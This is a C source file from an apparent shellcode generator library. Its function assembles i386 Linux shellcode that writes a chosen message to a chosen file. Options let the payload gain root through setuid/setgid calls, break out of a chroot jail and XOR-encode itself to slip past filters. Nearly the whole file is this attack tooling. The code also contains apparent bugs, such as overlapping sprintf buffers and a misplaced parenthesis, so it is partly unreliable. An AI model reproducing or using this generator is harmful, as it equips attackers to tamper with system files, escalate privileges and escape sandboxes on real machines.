/*
 *     __   ___   _
 *    /  \ |   \ | | /\---------<ShellCode Generator Library>----------------->
 *   / /\ \| |\ \| |/ /
 *  / /__\ \    /|   /          libShellCode is an ORK's project!
 *  \______/ |\ \| | \          For comments, bug reports, etc ...
 *<--------|_| \_\_|\_\         contact me at orkmail<at>katamail<dot>com
 *
 *
 */


#include "codes.h"
#include "i386_codes.h"
#include "i386_linux_codes.h"


/*
 * Function:    generate_i386_linux_file_write_SC()
 * Parameters:  char *f         the name of the file in which you want write
 *              char *msg       the message that you want write
 *              int  setuid     0 = none
 *                              1 = execute setuid(0)
 *                              2 = execute setreuid(0, 0)
 *                              3 = execute setresuid(0, 0, 0)
 *              int  setgid     0 = none
 *                              1 = execute setgid(0)
 *                              2 = execute setregid(0, 0)
 *                              3 = execute setresgid(0, 0, 0)
 *              int chroot_evasion 0 = none
 *                              1 = evade chroot() before open()
 *              int  cripted    0 = not encripted
 *                              1 = XOR Encription
 * Return:      char *          the pointer to the ShellCode generated
 * Description: Generates a ShellCode that writes a message to a file
 *
 */

char *generate_i386_linux_file_write_SC(char *f, char *msg, int setuid, int setgid, int chroot_evasion, int cripted)
{
  int lenfile, lenmsg;
  char pre_pop[64], after_pop[256], xor_code[64], *shellcode, *message, *file;
  unsigned char xor_byte;

  // Initialize x86 Linux codes
  initialize_codes(I386, LINUX);

  message = (char *) strdup(msg);
  file = (char *) strdup(f);

  lenmsg = strlen(message);
  lenfile = strlen(file);

  // setuid
  after_pop[0]=0;
  switch(setuid)
    {
    case 1:
      sprintf(after_pop, "%s%s\0", after_pop, SETUID_0);
      break;
    case 2:
      sprintf(after_pop, "%s%s\0", after_pop, SETREUID_0_0);
      break;
    case 3:
      sprintf(after_pop, "%s%s\0", after_pop, SETRESUID_0_0_0);
      break;
    }

  // setgid
  switch(setgid)
    {
    case 1:
      sprintf(after_pop, "%s%s\0", after_pop, SETGID_0);
      break;
    case 2:
      sprintf(after_pop, "%s%s\0", after_pop, SETREGID_0_0);
      break;
    case 3:
      sprintf(after_pop, "%s%s\0", after_pop, SETRESGID_0_0_0);
      break;
    }

  // chroot evasion
  if(chroot_evasion == 1)
    {
      sprintf(after_pop, "%s%s\0", after_pop, CHROOT_EVASION);
    }

  pre_pop[0]=0;

  sprintf(after_pop, "%s%s%s%s\0", after_pop, XOR_EAX_EAX, XOR_ECX_ECX, XOR_EDX_EDX);

  // Open
  MOV_IN_AL[1] = 5;                    // Select the open() system call
  MOV_IN_CX[2] = 0x42;                 // Open with O_RDWR|O_CREAT|O_APPEND attrib
  MOV_IN_CX[3] = 0x04;
  MOV_DL_nESI[2] = (char) lenfile;     // Put \0 at the end of the filename

  sprintf(after_pop, "%s%s%s\0", after_pop, MOV_IN_AL, MOV_ESI_EBX);
  sprintf(after_pop, "%s%s%s%s\0", after_pop, MOV_IN_CX, MOV_DL_nESI, INT_80);

  // Write
  LEA_nEBX_ECX[2] = (char) ++lenfile;  // ECX point to the beginning of the message
  MOV_IN_AL[1] = 4;                    // Select the write() system call
  MOV_IN_DL[1] = (char) lenmsg;        // Put in EDX the lenght of the message

  sprintf(after_pop, "%s%s%s\0", after_pop, LEA_nEBX_ECX, MOV_EAX_EBX);
  sprintf(after_pop, "%s%s%s\0", after_pop, XOR_EAX_EAX, MOV_IN_AL);
  sprintf(after_pop, "%s%s%s\0", after_pop, MOV_IN_DL, INT_80);

  // Exit
  sprintf(after_pop, "%s%s\0", after_pop, EXIT_0);

  // XOR Encription
  xor_code[0]=0;
  if (cripted == 1)
    {
      xor_byte = char_rnd_gen();
      while((xor_check(after_pop, xor_byte)||xor_check(file, xor_byte||xor_check(message, xor_byte))))
	{
	  xor_byte = char_rnd_gen();
	}

      cript(after_pop, xor_byte);
      cript(file, xor_byte); 
      cript(message, xor_byte); 

      MOV_IN_AL[1] = xor_byte;
      MOV_IN_CL[1] = (char) (strlen(after_pop) + strlen(file) + strlen(message) + strlen(CALLPOP) + 1);
      SUB_EBX[2] = (char) (strlen(after_pop) + strlen(CALLPOP));
      LOOP[1] = 0xfb;
      
      sprintf(xor_code, "%s%s%s", XOR_ECX_ECX, MOV_IN_AL, MOV_IN_CL);
      sprintf(xor_code, "%s%s%s", xor_code, MOV_ESI_EBX, SUB_EBX);
      sprintf(xor_code, "%s%s%s", xor_code, XOR_AL_EBX, INC_EBX);
      sprintf(xor_code, "%s%s", xor_code, LOOP); 
    }

  JMP[1] = (char) (strlen(after_pop) + strlen(xor_code) + 1);
  CALLPOP[1] = (char) (0xFF - (strlen(after_pop) + strlen(xor_code) + 4 + 1));

  sprintf(pre_pop, "%s%s%s\0", pre_pop, JMP, POP_ESI);
  sprintf(after_pop, "%s%s\0", after_pop, CALLPOP);

  shellcode = (char *) malloc(strlen(pre_pop)+strlen(after_pop)+strlen(file)+strlen(message)+strlen(xor_code) + 2);
  sprintf(shellcode, "%s%s%s%s\x31%s\0", pre_pop, xor_code, after_pop, file, message);

  free(message);
  free(file);
  free_codes(I386, LINUX);

  return shellcode;
}
